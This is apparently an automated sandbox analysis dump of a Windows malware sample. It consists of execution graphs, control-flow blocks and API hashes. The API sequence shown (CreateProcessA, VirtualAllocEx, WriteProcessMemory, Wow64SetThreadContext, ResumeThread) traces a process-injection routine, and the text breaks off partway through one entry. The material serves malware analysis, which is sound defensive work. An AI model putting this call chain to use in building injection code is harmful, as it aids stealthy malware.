                                  execution_graph 31894 6b87998 31895 6b87b23 31894->31895 31896 6b879be 31894->31896 31896->31895 31898 6b85f7c 31896->31898 31899 6b87c18 PostMessageW 31898->31899 31900 6b87c84 31899->31900 31900->31896 32174 4bc6cc8 32175 4bc6cf5 32174->32175 32182 4bc6800 32175->32182 32180 4bc6810 3 API calls 32181 4bc6e5e 32180->32181 32183 4bc680b 32182->32183 32190 4bc69a4 32183->32190 32185 4bc6dfa 32186 4bc6810 32185->32186 32187 4bc681b 32186->32187 32188 4bc6b44 3 API calls 32187->32188 32189 4bc6e2c 32188->32189 32189->32180 32191 4bc69af 32190->32191 32193 25183d2 3 API calls 32191->32193 32194 2515c9c 3 API calls 32191->32194 32192 4bc79cc 32192->32185 32193->32192 32194->32192 31901 251d0f8 31902 251d13e 31901->31902 31906 251d2c9 31902->31906 31910 251d2d8 31902->31910 31903 251d22b 31907 251d2d8 31906->31907 31913 251c9e0 31907->31913 31911 251c9e0 DuplicateHandle 31910->31911 31912 251d306 31911->31912 31912->31903 31914 251d340 DuplicateHandle 31913->31914 31915 251d306 31914->31915 31915->31903 32195 2514668 32196 251467a 32195->32196 32199 2514686 32196->32199 32201 2514778 32196->32201 32198 25146a5 32206 2513e10 32199->32206 32202 251479d 32201->32202 32210 2514878 32202->32210 32214 2514888 32202->32214 32207 2513e1b 32206->32207 32222 2515c1c 32207->32222 32209 251702b 32209->32198 32212 25148af 32210->32212 32211 251498c 32211->32211 32212->32211 32218 2514248 32212->32218 32215 25148af 32214->32215 32216 2514248 CreateActCtxA 32215->32216 32217 251498c 32215->32217 32216->32217 32219 2515918 CreateActCtxA 32218->32219 32221 25159db 32219->32221 32223 2515c27 32222->32223 32226 2515c3c 32223->32226 32225 25170d5 32225->32209 32227 2515c47 32226->32227 32230 2515c6c 32227->32230 32229 25171ba 32229->32225 32231 2515c77 32230->32231 32232 2515c9c 3 API calls 32231->32232 32233 25172ad 32232->32233 32233->32229 31768 4bc7c30 31769 4bc7c40 31768->31769 31772 4bc6b44 31769->31772 31771 4bc7c4f 31773 4bc6b4f 31772->31773 31774 
4bc7c82 31773->31774 31777 2515c9c 31773->31777 31786 25183d2 31773->31786 31774->31771 31778 2515ca7 31777->31778 31779 2518438 31778->31779 31795 25186e2 31778->31795 31781 2518693 31779->31781 31801 251ad40 31779->31801 31780 25186d1 31780->31774 31781->31780 31805 251ce20 31781->31805 31810 251ce30 31781->31810 31787 251840b 31786->31787 31788 2518438 31787->31788 31794 25186e2 3 API calls 31787->31794 31790 2518693 31788->31790 31791 251ad40 2 API calls 31788->31791 31789 25186d1 31789->31774 31790->31789 31792 251ce30 3 API calls 31790->31792 31793 251ce20 3 API calls 31790->31793 31791->31790 31792->31789 31793->31789 31794->31788 31796 25186a2 31795->31796 31798 25186ef 31795->31798 31797 25186d1 31796->31797 31799 251ce30 3 API calls 31796->31799 31800 251ce20 3 API calls 31796->31800 31797->31779 31798->31779 31799->31797 31800->31797 31815 251ad67 31801->31815 31819 251ad78 31801->31819 31802 251ad56 31802->31781 31806 251ce30 31805->31806 31807 251ce75 31806->31807 31842 251cfe0 31806->31842 31846 251cfb4 31806->31846 31807->31780 31811 251ce51 31810->31811 31812 251ce75 31811->31812 31813 251cfe0 3 API calls 31811->31813 31814 251cfb4 3 API calls 31811->31814 31812->31780 31813->31812 31814->31812 31816 251ad78 31815->31816 31822 251ae70 31816->31822 31817 251ad87 31817->31802 31821 251ae70 2 API calls 31819->31821 31820 251ad87 31820->31802 31821->31820 31823 251ae81 31822->31823 31824 251aea4 31822->31824 31823->31824 31830 251b0f8 31823->31830 31834 251b108 31823->31834 31824->31817 31825 251ae9c 31825->31824 31826 251b0a8 GetModuleHandleW 31825->31826 31827 251b0d5 31826->31827 31827->31817 31832 251b108 31830->31832 31831 251b141 31831->31825 31832->31831 31838 251a8b0 31832->31838 31835 251b11c 31834->31835 31836 251a8b0 LoadLibraryExW 31835->31836 31837 251b141 31835->31837 31836->31837 31837->31825 31839 251b2e8 LoadLibraryExW 31838->31839 31841 251b361 31839->31841 31841->31831 31843 251cfed 31842->31843 31844 251d027 31843->31844 31850 
251c918 31843->31850 31844->31807 31847 251cfe0 31846->31847 31848 251d027 31847->31848 31849 251c918 3 API calls 31847->31849 31848->31807 31849->31848 31851 251c923 31850->31851 31853 251d938 31851->31853 31854 251ca44 31851->31854 31853->31853 31855 251ca4f 31854->31855 31856 2515c9c 3 API calls 31855->31856 31857 251d9a7 31856->31857 31861 251f708 31857->31861 31867 251f720 31857->31867 31858 251d9e1 31858->31853 31863 251f851 31861->31863 31864 251f751 31861->31864 31862 251f75d 31862->31858 31863->31858 31864->31862 31873 4bc0db8 31864->31873 31878 4bc0dc8 31864->31878 31869 251f751 31867->31869 31870 251f851 31867->31870 31868 251f75d 31868->31858 31869->31868 31871 4bc0db8 CreateWindowExW 31869->31871 31872 4bc0dc8 CreateWindowExW 31869->31872 31870->31858 31871->31870 31872->31870 31874 4bc0df3 31873->31874 31875 4bc0ea2 31874->31875 31883 4bc1ca0 31874->31883 31886 4bc1c90 31874->31886 31880 4bc0df3 31878->31880 31879 4bc0ea2 31879->31879 31880->31879 31881 4bc1ca0 CreateWindowExW 31880->31881 31882 4bc1c90 CreateWindowExW 31880->31882 31881->31879 31882->31879 31890 4bc0aa8 31883->31890 31887 4bc1ca0 31886->31887 31888 4bc0aa8 CreateWindowExW 31887->31888 31889 4bc1cd5 31888->31889 31889->31875 31891 4bc1cf0 CreateWindowExW 31890->31891 31893 4bc1e14 31891->31893 31916 b0d01c 31917 b0d034 31916->31917 31918 b0d08e 31917->31918 31923 4bc2c08 31917->31923 31933 4bc1ea8 31917->31933 31937 4bc1e97 31917->31937 31941 4bc0ad4 31917->31941 31924 4bc2bfb 31923->31924 31926 4bc2c0e 31923->31926 31924->31918 31925 4bc2c79 31967 4bc0bfc 31925->31967 31926->31925 31928 4bc2c69 31926->31928 31950 4bc2e6c 31928->31950 31956 4bc2d90 31928->31956 31962 4bc2da0 31928->31962 31929 4bc2c77 31929->31929 31934 4bc1ece 31933->31934 31935 4bc0ad4 CallWindowProcW 31934->31935 31936 4bc1eef 31935->31936 31936->31918 31938 4bc1ea8 31937->31938 31939 4bc0ad4 CallWindowProcW 31938->31939 31940 4bc1eef 31939->31940 31940->31918 31942 4bc0adf 31941->31942 31943 4bc2c79 31942->31943 
31945 4bc2c69 31942->31945 31944 4bc0bfc CallWindowProcW 31943->31944 31946 4bc2c77 31944->31946 31947 4bc2e6c CallWindowProcW 31945->31947 31948 4bc2da0 CallWindowProcW 31945->31948 31949 4bc2d90 CallWindowProcW 31945->31949 31946->31946 31947->31946 31948->31946 31949->31946 31951 4bc2e2a 31950->31951 31952 4bc2e7a 31950->31952 31971 4bc2e58 31951->31971 31974 4bc2e47 31951->31974 31953 4bc2e40 31953->31929 31957 4bc2d88 31956->31957 31959 4bc2d9a 31956->31959 31957->31929 31958 4bc2e40 31958->31929 31960 4bc2e58 CallWindowProcW 31959->31960 31961 4bc2e47 CallWindowProcW 31959->31961 31960->31958 31961->31958 31964 4bc2db4 31962->31964 31963 4bc2e40 31963->31929 31965 4bc2e58 CallWindowProcW 31964->31965 31966 4bc2e47 CallWindowProcW 31964->31966 31965->31963 31966->31963 31968 4bc0c07 31967->31968 31969 4bc435a CallWindowProcW 31968->31969 31970 4bc4309 31968->31970 31969->31970 31970->31929 31972 4bc2e69 31971->31972 31978 4bc429e 31971->31978 31972->31953 31975 4bc2e55 31974->31975 31976 4bc2e69 31975->31976 31977 4bc429e CallWindowProcW 31975->31977 31976->31953 31977->31976 31979 4bc0bfc CallWindowProcW 31978->31979 31980 4bc42aa 31979->31980 31980->31972 31981 6b85396 31982 6b850ec 31981->31982 31983 6b85150 31982->31983 31987 6b868de 31982->31987 32006 6b86871 31982->32006 32024 6b86880 31982->32024 31988 6b8686c 31987->31988 31989 6b868e1 31987->31989 32042 6b8716e 31988->32042 32047 6b8736d 31988->32047 32054 6b86eab 31988->32054 32061 6b870ca 31988->32061 32066 6b86f4a 31988->32066 32070 6b86fa9 31988->32070 32075 6b87034 31988->32075 32080 6b86fd2 31988->32080 32087 6b86cb0 31988->32087 32091 6b86e5f 31988->32091 32096 6b86d07 31988->32096 32103 6b873c4 31988->32103 32110 6b86d23 31988->32110 32117 6b87421 31988->32117 32121 6b87061 31988->32121 31989->31983 31990 6b868be 31990->31983 32007 6b8689a 32006->32007 32009 6b86e5f 2 API calls 32007->32009 32010 6b86cb0 2 API calls 32007->32010 32011 6b86fd2 4 API calls 32007->32011 32012 6b87034 2 API calls 
32007->32012 32013 6b86fa9 2 API calls 32007->32013 32014 6b86f4a 2 API calls 32007->32014 32015 6b870ca 2 API calls 32007->32015 32016 6b86eab 4 API calls 32007->32016 32017 6b8736d 4 API calls 32007->32017 32018 6b8716e 2 API calls 32007->32018 32019 6b87061 2 API calls 32007->32019 32020 6b87421 2 API calls 32007->32020 32021 6b86d23 4 API calls 32007->32021 32022 6b873c4 4 API calls 32007->32022 32023 6b86d07 4 API calls 32007->32023 32008 6b868be 32008->31983 32009->32008 32010->32008 32011->32008 32012->32008 32013->32008 32014->32008 32015->32008 32016->32008 32017->32008 32018->32008 32019->32008 32020->32008 32021->32008 32022->32008 32023->32008 32025 6b8689a 32024->32025 32027 6b86e5f 2 API calls 32025->32027 32028 6b86cb0 2 API calls 32025->32028 32029 6b86fd2 4 API calls 32025->32029 32030 6b87034 2 API calls 32025->32030 32031 6b86fa9 2 API calls 32025->32031 32032 6b86f4a 2 API calls 32025->32032 32033 6b870ca 2 API calls 32025->32033 32034 6b86eab 4 API calls 32025->32034 32035 6b8736d 4 API calls 32025->32035 32036 6b8716e 2 API calls 32025->32036 32037 6b87061 2 API calls 32025->32037 32038 6b87421 2 API calls 32025->32038 32039 6b86d23 4 API calls 32025->32039 32040 6b873c4 4 API calls 32025->32040 32041 6b86d07 4 API calls 32025->32041 32026 6b868be 32026->31983 32027->32026 32028->32026 32029->32026 32030->32026 32031->32026 32032->32026 32033->32026 32034->32026 32035->32026 32036->32026 32037->32026 32038->32026 32039->32026 32040->32026 32041->32026 32043 6b87174 32042->32043 32044 6b8756a 32043->32044 32126 6b847ff 32043->32126 32130 6b84800 32043->32130 32048 6b86d0f 32047->32048 32048->31990 32049 6b87551 32048->32049 32134 6b84a48 32048->32134 32138 6b84a40 32048->32138 32142 6b84988 32048->32142 32146 6b84980 32048->32146 32049->31990 32055 6b86d0f 32054->32055 32055->31990 32056 6b87551 32055->32056 32057 6b84988 VirtualAllocEx 32055->32057 32058 6b84980 VirtualAllocEx 32055->32058 32059 6b84a48 WriteProcessMemory 32055->32059 32060 
6b84a40 WriteProcessMemory 32055->32060 32056->31990 32057->32055 32058->32055 32059->32055 32060->32055 32062 6b87082 32061->32062 32062->32061 32150 6b848a8 32062->32150 32154 6b848b0 32062->32154 32063 6b87285 32158 6b84b38 32066->32158 32162 6b84b37 32066->32162 32067 6b86f6c 32071 6b86fcc 32070->32071 32073 6b84a48 WriteProcessMemory 32071->32073 32074 6b84a40 WriteProcessMemory 32071->32074 32072 6b87454 32073->32072 32074->32072 32076 6b874ce 32075->32076 32078 6b848a8 Wow64SetThreadContext 32076->32078 32079 6b848b0 Wow64SetThreadContext 32076->32079 32077 6b874e9 32078->32077 32079->32077 32081 6b86d0f 32080->32081 32081->31990 32082 6b87551 32081->32082 32083 6b84a48 WriteProcessMemory 32081->32083 32084 6b84a40 WriteProcessMemory 32081->32084 32085 6b84988 VirtualAllocEx 32081->32085 32086 6b84980 VirtualAllocEx 32081->32086 32082->31990 32083->32081 32084->32081 32085->32081 32086->32081 32166 6b84cd0 32087->32166 32170 6b84cc4 32087->32170 32092 6b86e82 32091->32092 32093 6b8756a 32092->32093 32094 6b847ff ResumeThread 32092->32094 32095 6b84800 ResumeThread 32092->32095 32094->32092 32095->32092 32097 6b86d0f 32096->32097 32097->31990 32098 6b87551 32097->32098 32099 6b84988 VirtualAllocEx 32097->32099 32100 6b84980 VirtualAllocEx 32097->32100 32101 6b84a48 WriteProcessMemory 32097->32101 32102 6b84a40 WriteProcessMemory 32097->32102 32098->31990 32099->32097 32100->32097 32101->32097 32102->32097 32104 6b86d0f 32103->32104 32104->31990 32105 6b87551 32104->32105 32106 6b84988 VirtualAllocEx 32104->32106 32107 6b84980 VirtualAllocEx 32104->32107 32108 6b84a48 WriteProcessMemory 32104->32108 32109 6b84a40 WriteProcessMemory 32104->32109 32105->31990 32106->32104 32107->32104 32108->32104 32109->32104 32112 6b86d0f 32110->32112 32111 6b87551 32111->31990 32112->31990 32112->32111 32113 6b84988 VirtualAllocEx 32112->32113 32114 6b84980 VirtualAllocEx 32112->32114 32115 6b84a48 WriteProcessMemory 32112->32115 32116 6b84a40 WriteProcessMemory 32112->32116 
32113->32112 32114->32112 32115->32112 32116->32112 32118 6b87454 32117->32118 32119 6b84a48 WriteProcessMemory 32117->32119 32120 6b84a40 WriteProcessMemory 32117->32120 32119->32118 32120->32118 32122 6b8706a 32121->32122 32124 6b84a48 WriteProcessMemory 32122->32124 32125 6b84a40 WriteProcessMemory 32122->32125 32123 6b8714f 32123->31990 32124->32123 32125->32123 32127 6b84800 ResumeThread 32126->32127 32129 6b84871 32127->32129 32129->32043 32131 6b84840 ResumeThread 32130->32131 32133 6b84871 32131->32133 32133->32043 32135 6b84a90 WriteProcessMemory 32134->32135 32137 6b84ae7 32135->32137 32137->32048 32139 6b84a49 WriteProcessMemory 32138->32139 32141 6b84ae7 32139->32141 32141->32048 32143 6b849c8 VirtualAllocEx 32142->32143 32145 6b84a05 32143->32145 32145->32048 32147 6b84988 VirtualAllocEx 32146->32147 32149 6b84a05 32147->32149 32149->32048 32151 6b848b0 Wow64SetThreadContext 32150->32151 32153 6b8493d 32151->32153 32153->32063 32155 6b848f5 Wow64SetThreadContext 32154->32155 32157 6b8493d 32155->32157 32157->32063 32159 6b84b83 ReadProcessMemory 32158->32159 32161 6b84bc7 32159->32161 32161->32067 32163 6b84b38 ReadProcessMemory 32162->32163 32165 6b84bc7 32163->32165 32165->32067 32167 6b84d59 CreateProcessA 32166->32167 32169 6b84f1b 32167->32169 32171 6b84d59 CreateProcessA 32170->32171 32173 6b84f1b 32171->32173

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 508 6b84cc4-6b84d65 510 6b84d9e-6b84dbe 508->510 511 6b84d67-6b84d71 508->511 516 6b84dc0-6b84dca 510->516 517 6b84df7-6b84e26 510->517 511->510 512 6b84d73-6b84d75 511->512 514 6b84d98-6b84d9b 512->514 515 6b84d77-6b84d81 512->515 514->510 518 6b84d83 515->518 519 6b84d85-6b84d94 515->519 516->517 520 6b84dcc-6b84dce 516->520 527 6b84e28-6b84e32 517->527 528 6b84e5f-6b84f19 CreateProcessA 517->528 518->519 519->519 521 6b84d96 519->521 522 6b84dd0-6b84dda 520->522 523 6b84df1-6b84df4 520->523 521->514 525 6b84ddc 522->525 526 6b84dde-6b84ded 522->526 523->517 525->526 526->526 529 6b84def 526->529 527->528 530 6b84e34-6b84e36 527->530 539 6b84f1b-6b84f21 528->539 540 6b84f22-6b84fa8 528->540 529->523 532 6b84e38-6b84e42 530->532 533 6b84e59-6b84e5c 530->533 534 6b84e44 532->534 535 6b84e46-6b84e55 532->535 533->528 534->535 535->535 536 6b84e57 535->536 536->533 539->540 550 6b84fb8-6b84fbc 540->550 551 6b84faa-6b84fae 540->551 553 6b84fcc-6b84fd0 550->553 554 6b84fbe-6b84fc2 550->554 551->550 552 6b84fb0 551->552 552->550 556 6b84fe0-6b84fe4 553->556 557 6b84fd2-6b84fd6 553->557 554->553 555 6b84fc4 554->555 555->553 558 6b84ff6-6b84ffd 556->558 559 6b84fe6-6b84fec 556->559 557->556 560 6b84fd8 557->560 561 6b84fff-6b8500e 558->561 562 6b85014 558->562 559->558 560->556 561->562 564 6b85015 562->564 564->564
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B84F06
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 9854ff102dfe6f6134945ae62dab3901d51eedd0f296fed51a3491fc8504e338
                                  • Instruction ID: 24be0f8e217ae21d0fa3823b0e9c426c8491685c98fdcd6ebf50a420f0856ae9
                                  • Opcode Fuzzy Hash: 9854ff102dfe6f6134945ae62dab3901d51eedd0f296fed51a3491fc8504e338
                                  • Instruction Fuzzy Hash: 3B914BB1D0021A8FEB64DFA8C8417DDBAF2FF48314F1485A9E808A7294DB749985CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 565 6b84cd0-6b84d65 567 6b84d9e-6b84dbe 565->567 568 6b84d67-6b84d71 565->568 573 6b84dc0-6b84dca 567->573 574 6b84df7-6b84e26 567->574 568->567 569 6b84d73-6b84d75 568->569 571 6b84d98-6b84d9b 569->571 572 6b84d77-6b84d81 569->572 571->567 575 6b84d83 572->575 576 6b84d85-6b84d94 572->576 573->574 577 6b84dcc-6b84dce 573->577 584 6b84e28-6b84e32 574->584 585 6b84e5f-6b84f19 CreateProcessA 574->585 575->576 576->576 578 6b84d96 576->578 579 6b84dd0-6b84dda 577->579 580 6b84df1-6b84df4 577->580 578->571 582 6b84ddc 579->582 583 6b84dde-6b84ded 579->583 580->574 582->583 583->583 586 6b84def 583->586 584->585 587 6b84e34-6b84e36 584->587 596 6b84f1b-6b84f21 585->596 597 6b84f22-6b84fa8 585->597 586->580 589 6b84e38-6b84e42 587->589 590 6b84e59-6b84e5c 587->590 591 6b84e44 589->591 592 6b84e46-6b84e55 589->592 590->585 591->592 592->592 593 6b84e57 592->593 593->590 596->597 607 6b84fb8-6b84fbc 597->607 608 6b84faa-6b84fae 597->608 610 6b84fcc-6b84fd0 607->610 611 6b84fbe-6b84fc2 607->611 608->607 609 6b84fb0 608->609 609->607 613 6b84fe0-6b84fe4 610->613 614 6b84fd2-6b84fd6 610->614 611->610 612 6b84fc4 611->612 612->610 615 6b84ff6-6b84ffd 613->615 616 6b84fe6-6b84fec 613->616 614->613 617 6b84fd8 614->617 618 6b84fff-6b8500e 615->618 619 6b85014 615->619 616->615 617->613 618->619 621 6b85015 619->621 621->621
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B84F06
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 5c64b285ac14a7bdef1e0ba8fa78cbe5705c749d4cc6a66b2182aa711eb7fafb
                                  • Instruction ID: 0af95b92089b674baa5809718f9891734976de36c092a66e9d7a5447be5b4ba9
                                  • Opcode Fuzzy Hash: 5c64b285ac14a7bdef1e0ba8fa78cbe5705c749d4cc6a66b2182aa711eb7fafb
                                  • Instruction Fuzzy Hash: 2C913AB1D0061A8FEB64DF68C84179EBBF2FF48314F1485A9E808A7294DB749985CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 622 251ae70-251ae7f 623 251ae81-251ae8e call 2519878 622->623 624 251aeab-251aeaf 622->624 629 251ae90 623->629 630 251aea4 623->630 626 251aeb1-251aebb 624->626 627 251aec3-251af04 624->627 626->627 633 251af11-251af1f 627->633 634 251af06-251af0e 627->634 678 251ae96 call 251b0f8 629->678 679 251ae96 call 251b108 629->679 630->624 635 251af21-251af26 633->635 636 251af43-251af45 633->636 634->633 638 251af31 635->638 639 251af28-251af2f call 251a854 635->639 641 251af48-251af4f 636->641 637 251ae9c-251ae9e 637->630 640 251afe0-251b0a0 637->640 643 251af33-251af41 638->643 639->643 673 251b0a2-251b0a5 640->673 674 251b0a8-251b0d3 GetModuleHandleW 640->674 644 251af51-251af59 641->644 645 251af5c-251af63 641->645 643->641 644->645 647 251af70-251af79 call 251a864 645->647 648 251af65-251af6d 645->648 653 251af86-251af8b 647->653 654 251af7b-251af83 647->654 648->647 655 251afa9-251afad 653->655 656 251af8d-251af94 653->656 654->653 661 251afb3-251afb6 655->661 656->655 658 251af96-251afa6 call 251a874 call 251a884 656->658 658->655 663 251afd9-251afdf 661->663 664 251afb8-251afd6 661->664 664->663 673->674 675 251b0d5-251b0db 674->675 676 251b0dc-251b0f0 674->676 675->676 678->637 679->637
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0251B0C6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 88a72bc04ecf8b903edc778a4fe657518783dc8fb1ada72c9d5fd7cfed884cec
                                  • Instruction ID: 4b4b1e8143c789ab8abc15c955f8fa30f33007863c8157230a05cd7b685f6cf5
                                  • Opcode Fuzzy Hash: 88a72bc04ecf8b903edc778a4fe657518783dc8fb1ada72c9d5fd7cfed884cec
                                  • Instruction Fuzzy Hash: F67168B1A01B059FEB25DF29D14075ABBF1FF88304F008A2DE48AD7A50DB34E945CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 680 4bc1ce4-4bc1d56 682 4bc1d58-4bc1d5e 680->682 683 4bc1d61-4bc1d68 680->683 682->683 684 4bc1d6a-4bc1d70 683->684 685 4bc1d73-4bc1dab 683->685 684->685 686 4bc1db3-4bc1e12 CreateWindowExW 685->686 687 4bc1e1b-4bc1e53 686->687 688 4bc1e14-4bc1e1a 686->688 692 4bc1e55-4bc1e58 687->692 693 4bc1e60 687->693 688->687 692->693 694 4bc1e61 693->694 694->694
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BC1E02
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2045734838.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_4bc0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 4f311e9c29cefc956bffea0b538bc3f6c4d26c23595acee53354848fd7b7165b
                                  • Instruction ID: 98f419c23348b0ff6ba7ad403a2657aab972d7a3ce82879f8a107401e5257940
                                  • Opcode Fuzzy Hash: 4f311e9c29cefc956bffea0b538bc3f6c4d26c23595acee53354848fd7b7165b
                                  • Instruction Fuzzy Hash: B551D0B1D00309EFDB14CF99C984ADEBBB6FF48314F24856AE418AB211D775A885CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 695 4bc0aa8-4bc1d56 697 4bc1d58-4bc1d5e 695->697 698 4bc1d61-4bc1d68 695->698 697->698 699 4bc1d6a-4bc1d70 698->699 700 4bc1d73-4bc1e12 CreateWindowExW 698->700 699->700 702 4bc1e1b-4bc1e53 700->702 703 4bc1e14-4bc1e1a 700->703 707 4bc1e55-4bc1e58 702->707 708 4bc1e60 702->708 703->702 707->708 709 4bc1e61 708->709 709->709
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BC1E02
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2045734838.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_4bc0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 3b547d0c92a89588266ef891829c014777dc14d0f4e247de0b40404d2b057a4b
                                  • Instruction ID: 3b54fa5db6dab748b1c0ac3d8146d8fd98ff82e9ede505aab25c5a65ce72645d
                                  • Opcode Fuzzy Hash: 3b547d0c92a89588266ef891829c014777dc14d0f4e247de0b40404d2b057a4b
                                  • Instruction Fuzzy Hash: FA51B0B1D00209EFDB14CF99C984ADEBBB5FF48314F64856AE818AB215D774A885CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 835 4bc0bfc-4bc42fc 838 4bc43ac-4bc43cc call 4bc0ad4 835->838 839 4bc4302-4bc4307 835->839 846 4bc43cf-4bc43dc 838->846 841 4bc4309-4bc4340 839->841 842 4bc435a-4bc4392 CallWindowProcW 839->842 849 4bc4349-4bc4358 841->849 850 4bc4342-4bc4348 841->850 844 4bc439b-4bc43aa 842->844 845 4bc4394-4bc439a 842->845 844->846 845->844 849->846 850->849
                                  APIs
                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04BC4381
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2045734838.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_4bc0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: CallProcWindow
                                  • String ID:
                                  • API String ID: 2714655100-0
                                  • Opcode ID: a904cd16b20708bba434afb7640bdf1a3553532f2ace6619a4c7930b8c4fc733
                                  • Instruction ID: 8bc9a39f11364bcd7e1a35744b57f601dd3b6cbeee0d3628a16b1846d6b7f643
                                  • Opcode Fuzzy Hash: a904cd16b20708bba434afb7640bdf1a3553532f2ace6619a4c7930b8c4fc733
                                  • Instruction Fuzzy Hash: 0F411AB59003059FDB14DF99C888AAEBBF5FF88314F14C59DE519A7321D374A941CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 818 251590c-2515914 819 251591c-25159d9 CreateActCtxA 818->819 821 25159e2-2515a3c 819->821 822 25159db-25159e1 819->822 829 2515a4b-2515a4f 821->829 830 2515a3e-2515a41 821->830 822->821 831 2515a51-2515a5d 829->831 832 2515a60 829->832 830->829 831->832 834 2515a61 832->834 834->834
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 025159C9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 8075f4944d7b1826f2ca81147a03ba37f353dd79f8b5d0013f9366bd1f91e343
                                  • Instruction ID: bcef6c3d441dbaecf30997854a95bd647f75ba71c4929e74369a9ec0fb95b6d2
                                  • Opcode Fuzzy Hash: 8075f4944d7b1826f2ca81147a03ba37f353dd79f8b5d0013f9366bd1f91e343
                                  • Instruction Fuzzy Hash: 4F41F3B0D00619CBEB24DFAAC9847CDBBF5FF48305F60806AD419AB254DB75694ACF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Basic blocks: 852 (2514248-25159d9) CreateActCtxA; 855 (25159e2-2515a3c); 856 (25159db-25159e1); 863 (2515a4b-2515a4f); 864 (2515a3e-2515a41); 865 (2515a51-2515a5d); 866 (2515a60); 868 (2515a61)
                                  • Edges: 852->855, 852->856, 855->863, 855->864, 856->855, 863->865, 863->866, 864->863, 865->866, 866->868, 868->868
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 025159C9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: a1cd44156c88fe23df4854501e5b0d597f0051caedcff0e9f1c052e27d9666e6
                                  • Instruction ID: 9494b6cdcb659564bdca95844bece9924eccf134f23cd130fcaf7d67392e6063
                                  • Opcode Fuzzy Hash: a1cd44156c88fe23df4854501e5b0d597f0051caedcff0e9f1c052e27d9666e6
                                  • Instruction Fuzzy Hash: E641D2B0C00619CBEB24DFAAC884B9DBBF5FF49305F60806AD408AB255DB756945CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B84AD8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
